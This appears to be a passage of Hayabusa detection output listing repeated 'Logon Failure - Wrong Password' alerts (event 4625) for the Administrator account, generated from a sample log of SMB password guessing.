+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.637 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.077 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.625 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.119 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
